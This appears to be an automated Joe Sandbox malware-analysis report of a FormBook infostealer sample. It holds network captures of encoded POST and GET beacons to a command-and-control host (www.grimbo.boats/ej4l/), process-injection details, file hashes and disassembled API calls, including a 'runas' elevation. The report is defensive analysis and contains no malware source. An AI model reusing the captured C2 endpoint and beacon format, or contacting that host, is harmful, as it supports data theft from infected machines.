31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49734	104.21.18.171	80	1816	C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:02:49.742393970 CET	674	OUT	POST /ej4l/ HTTP/1.1 Host: www.grimbo.boats Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 231 Origin: http://www.grimbo.boats Referer: http://www.grimbo.boats/ej4l/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0 Data Raw: 6a 54 3d 65 74 4b 73 2b 33 47 36 43 55 70 48 5a 58 43 2b 4a 63 68 78 37 45 33 54 4a 53 56 46 36 66 34 68 4c 49 79 44 2f 70 6c 77 6b 50 65 50 32 5a 53 37 6b 71 4d 55 65 46 73 64 59 55 39 6f 49 4d 4b 36 77 73 75 53 64 37 34 78 52 30 7a 32 6b 61 4f 6b 4c 59 4f 63 35 69 55 6a 35 77 4a 76 73 35 4d 57 4a 38 70 76 52 47 59 76 38 35 63 74 32 44 77 4b 7a 53 45 34 63 6e 52 2f 61 56 4a 73 4f 58 56 6d 5a 71 41 30 38 74 51 57 38 32 53 49 61 65 38 42 62 55 48 57 44 2b 44 79 50 31 62 74 4d 42 64 52 76 64 54 2b 77 72 6d 4a 49 68 6f 51 61 38 44 2f 53 49 44 50 6a 63 67 6f 50 62 77 4b 32 49 65 2b 6f 64 65 7a 62 7a 75 49 33 31 59 39 76 32 43 67 35 38 43 5a 55 4d 4b 4e 73 59 54 59 49 71 37 51 56 67 3d 3d Data Ascii: jT=etKs+3G6CUpHZXC+Jchx7E3TJSVF6f4hLIyD/plwkPeP2ZS7kqMUeFsdYU9oIMK6wsuSd74xR0z2kaOkLYOc5iUj5wJvs5MWJ8pvRGYv85ct2DwKzSE4cnR/aVJsOXVmZqA08tQW82SIae8BbUHWD+DyP1btMBdRvdT+wrmJIhoQa8D/SIDPjcgoPbwK2Ie+odezbzuI31Y9v2Cg58CZUMKNsYTYIq7QVg==
Jan 10, 2025 18:02:50.424998999 CET	1087	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 17:02:50 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n6rsL01UE9oqI7BMAmkpoq6ojuxvnfPwMWxi7YBGq%2FNf4cE763Z5URyw4Tl90vJx24Y2dYirbC%2FdXJHeMqsZK2xWZGYuZu%2FnjG1fjlI5DLmQcpnOuQ%2Bxw6x%2B5PcAfeDpQLF5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe3cab5c29443e-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1712&rtt_var=856&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=674&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49735	104.21.18.171	80	1816	C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:02:52.286041021 CET	1687	OUT	POST /ej4l/ HTTP/1.1 Host: www.grimbo.boats Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Origin: http://www.grimbo.boats Referer: http://www.grimbo.boats/ej4l/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0 Data Raw: 6a 54 3d 65 74 4b 73 2b 33 47 36 43 55 70 48 5a 58 43 2b 4a 63 68 78 37 45 33 54 4a 53 56 46 36 66 34 68 4c 49 79 44 2f 70 6c 77 6b 50 57 50 32 72 61 37 6b 4e 59 55 66 46 73 64 51 30 39 74 49 4d 4b 6e 77 74 47 65 64 37 39 54 52 32 37 32 6b 34 47 6b 44 4a 4f 63 67 53 55 6a 77 51 4a 69 68 5a 4e 4d 4a 38 35 72 52 47 49 76 38 35 63 74 32 41 34 4b 33 47 6f 34 65 6e 52 34 64 56 49 6a 4b 58 56 4f 5a 71 5a 42 38 74 55 67 38 48 79 49 61 2b 73 42 63 6e 2f 57 4c 2b 44 77 66 6c 61 77 4d 42 52 43 76 64 66 63 77 71 69 6e 49 68 63 51 62 71 4f 33 4e 4d 7a 72 39 2f 52 4b 62 4b 51 79 39 64 43 42 70 4d 75 5a 4b 53 4b 63 36 31 49 43 69 6a 69 6d 35 63 54 6b 53 66 79 34 6f 66 50 54 64 49 79 70 48 45 41 4d 68 45 52 5a 70 36 32 72 41 67 71 72 2b 73 48 37 2b 6a 69 53 41 6d 32 34 50 32 76 67 79 38 30 6c 66 69 38 33 4e 48 30 77 6e 2f 55 34 79 4c 4f 4f 42 70 5a 47 73 31 73 4b 48 54 47 56 33 74 44 63 71 49 51 5a 71 6a 38 71 58 68 52 48 51 37 46 55 63 76 51 33 51 61 34 48 59 48 4a 6e 48 48 2f 6a 6a 55 6d 46 32 55 33 73 70 6a 62 [TRUNCATED] Data Ascii: jT=etKs+3G6CUpHZXC+Jchx7E3TJSVF6f4hLIyD/plwkPWP2ra7kNYUfFsdQ09tIMKnwtGed79TR272k4GkDJOcgSUjwQJihZNMJ85rRGIv85ct2A4K3Go4enR4dVIjKXVOZqZB8tUg8HyIa+sBcn/WL+DwflawMBRCvdfcwqinIhcQbqO3NMzr9/RKbKQy9dCBpMuZKSKc61ICijim5cTkSfy4ofPTdIypHEAMhERZp62rAgqr+sH7+jiSAm24P2vgy80lfi83NH0wn/U4yLOOBpZGs1sKHTGV3tDcqIQZqj8qXhRHQ7FUcvQ3Qa4HYHJnHH/jjUmF2U3spjbOG8rM9IyoXDX9eNr0ttdfqJoH1AwoYPrmTWyNEviq5bxVlLT7tfgM5BleXignT7ZRL42Y/2Qci+jwfEifAG+tMW4nQpekqz8D9RAAy1EES4ZeFa3WE6Qo+e5M+G+k0+X4RIRiUyQhwnVvrdO4SBnuwqg6+F0kiM/UeZGsBxKIOT3vvvdM1fZRzx1sX6QEzkUlAXsyXxIiJv/JSLElQ1rf9Uy/RqbwiX3oswQk75mbPXSy4sCx0/zd9g2J/b5An+Q6GuVci2CGxeReOxt02nndkjobAyBbwxyvF1Zvi3LJrp3nfXUMh67J6xGMsMJOjXHk0NIWVfZlG1OGM9IRihy87LVim87+Ii655d4HKeCdhducQMmnzNldaBaTFKeU6QgUTypP35myA5A96zNS+/IaOQSVDUuAqptWBtvzqhzsLug0fPvjorRaohmEerz0Ibwqryil94dxFkUuHpLLBMNzRaEbiaw8aosOO0DNzR3FvEnMwh79llnIFfW1Db76dFgfc4wiUm+B3rhmJxeg6Vj0vRTXyYSlOGGK11eDBcJsN2TEy+bgEH0erX254UYOFBny8UvQYC1oBQDoZB7yDD0S9aYYHszohmmRURsyBXvF9nmMpqI/U3p6HLUOOv58eOkjwom8GVC6t6It4bjl4RX+Nf7ZhRyCDw9+j [TRUNCATED]
Jan 10, 2025 18:02:52.969345093 CET	1090	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 17:02:52 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=udEuAWlBhcMQUPrgahSsooG6tLMvR%2B3qUnOYhA3DbtnESD%2FU7D8md%2FWDazZ4PjvFbKyZRofp%2F%2FoRzP0uKAXYQsNPJojWWWd5JWIt1H8hhJ2i5dmXTFmrU2u%2F9J9YRXPZht2E"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe3cbb4d91426a-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1593&rtt_var=796&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1687&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49736	104.21.18.171	80	1816	C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:02:54.827641010 CET	393	OUT	GET /ej4l/?jT=TviM9A7gHy1aV0uzN+xbmzzcXhhU0op9aqme4YAfufO2xJ6qsqEsFloERXhIecS+xM6WSeF6JnXzi9yaG/Cy6FB65DdAh+xVUrF/YXRKiZhV1QAbsSFCcmJpeQFsCmEmOOsC+Ls=&JDE4I=Cr640F7p HTTP/1.1 Host: www.grimbo.boats Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0
Jan 10, 2025 18:02:55.463665009 CET	1101	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 17:02:55 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FVyc6fZq6Ex%2FOiGor1LeEAaZryKgckhSegA3mktgVao%2FZyrKhtFKTs7HPNWNjOCb2I2nJ9aIYOcCvUHQYc05dOp8NsC3HktaxHYdZ2QOnzFnWdNXIsFrPtNlukZsp1oAAdZi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe3ccb198d0c7c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1501&min_rtt=1501&rtt_var=750&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=74&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 31 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 115<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>10

Target ID:	0
Start time:	12:00:52
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\smQoKNkwB7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\smQoKNkwB7.exe"
Imagebase:	0x1e0000
File size:	1'244'160 bytes
MD5 hash:	5FC85A215CAE58FE521C9F12F5169A99
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:00:53
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\smQoKNkwB7.exe"
Imagebase:	0x190000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2889384999.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2890849255.0000000006400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2890116431.00000000033F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:01:40
Start date:	10/01/2025
Path:	C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe"
Imagebase:	0x650000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3580689111.00000000095B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3569480594.00000000057A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	12:01:41
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\mtstocom.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\mtstocom.exe"
Imagebase:	0xf20000
File size:	113'152 bytes
MD5 hash:	5930C59472F42B5F237500C999727441
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3567988233.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3568159878.0000000003590000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3569278704.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	12:02:06
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	5%
Total number of Nodes:	2000
Total number of Limit Nodes:	49

Executed Functions

Function 001E42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 001E430D

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

GetCurrentProcess.KERNEL32(?,0027CB64,00000000,?,?), ref: 001E4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 001E4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 001E4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 001E4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 001E4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 001E447B
GetSystemInfo.KERNEL32(?,?,?), ref: 001E44A0

Strings

kernel32.dll, xrefs: 001E444F
|O, xrefs: 002236F8
GetNativeSystemInfo, xrefs: 001E4460

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 2016962d5d25a28e16aefe6a5c2ec9b8070ff448c1db60c4457af20be7f73880
Instruction ID: 40ba96c64887bf90ec0129cce916e0a8fa31405a4b87e500557d129ca31f99c1
Opcode Fuzzy Hash: 2016962d5d25a28e16aefe6a5c2ec9b8070ff448c1db60c4457af20be7f73880
Instruction Fuzzy Hash: 8BA1D661A1A7D0DFCB15CBB97C6C1A97FE47B26300B984AEDE04593B61F32445A4CB21

Function 001E42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001E50AA,?,?,00000000,00000000), ref: 001E42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001E50AA,?,?,00000000,00000000), ref: 001E42C9
LoadResource.KERNEL32(?,00000000,?,?,001E50AA,?,?,00000000,00000000,?,?,?,?,?,?,001E4F20), ref: 002235BE
SizeofResource.KERNEL32(?,00000000,?,?,001E50AA,?,?,00000000,00000000,?,?,?,?,?,?,001E4F20), ref: 002235D3
LockResource.KERNEL32(001E50AA,?,?,001E50AA,?,?,00000000,00000000,?,?,?,?,?,?,001E4F20,?), ref: 002235E6

Strings

SCRIPT, xrefs: 001E42BF

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 7960cbb65632a4c64f8ce2e7049ca3960c04a080ebb9d9f993afd12f0e23d271
Instruction ID: 5f7371a41e0e8d7a6cd1e6a4942e40c3ce86791075182c2deea99f7bedb5deb8
Opcode Fuzzy Hash: 7960cbb65632a4c64f8ce2e7049ca3960c04a080ebb9d9f993afd12f0e23d271
Instruction Fuzzy Hash: 46118E70200702BFD7218FA6EC48F6B7BB9EBC5B51F24816DF946D6260DB71DC508620

Function 00222BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 001E2B6B

Part of subcall function 001E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002B1418,?,001E2E7F,?,?,?,00000000), ref: 001E3A78

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,002A2224), ref: 00222C10
ShellExecuteW.SHELL32(00000000,?,?,002A2224), ref: 00222C17

Strings

runas, xrefs: 00222C0B

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 989936b9004b8545a7f54c92c1d768e11d5f4287422b53a9f58b672d88b6e3a4
Instruction ID: cd687bf0232331c3673d09c29dd10042a3c8aa14e7d211bd40315c32e315822d
Opcode Fuzzy Hash: 989936b9004b8545a7f54c92c1d768e11d5f4287422b53a9f58b672d88b6e3a4
Instruction Fuzzy Hash: F1110A31104BC1ABC714FF62E869DAEB7A8ABB1340F54042CF056170A2DF3189598712

Function 0024DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00225222), ref: 0024DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0024DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0024DBEE
FindClose.KERNEL32(00000000), ref: 0024DBFA

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: b4cecb2ab5a503e2f73acab80b293256c9d934a4c7ea51286139183833546b7b
Instruction ID: 97931805128835df756d93a575d840d8d34f71e4862d4c265ec949be594b77f1
Opcode Fuzzy Hash: b4cecb2ab5a503e2f73acab80b293256c9d934a4c7ea51286139183833546b7b
Instruction Fuzzy Hash: 2CF0A0308209105782256FBCEC4D8AA376C9F02334BA0471BF83AC20E0EBB059E48A95

Function 001EBF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON

Download Yara Rule

Strings

p#+, xrefs: 002307CE

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: BuffCharUpper
String ID: p#+
API String ID: 3964851224-3114614627
Opcode ID: 51afedd9519c53b19899bbe7eff74d98cd5ebbbecbf5f00ad9f37374fea5aed0
Instruction ID: 18ff85ed73cedc25ab50db37b55f69866fd47f0ed401ea595e94652db017257c
Opcode Fuzzy Hash: 51afedd9519c53b19899bbe7eff74d98cd5ebbbecbf5f00ad9f37374fea5aed0
Instruction Fuzzy Hash: B0A269B06087418FD714CF19C890B2ABBE1BF99304F15896DF99A8B352D771EC46CB92

Function 001ED730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 001ED807
timeGetTime.WINMM ref: 001EDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EDB28
TranslateMessage.USER32(?), ref: 001EDB7B
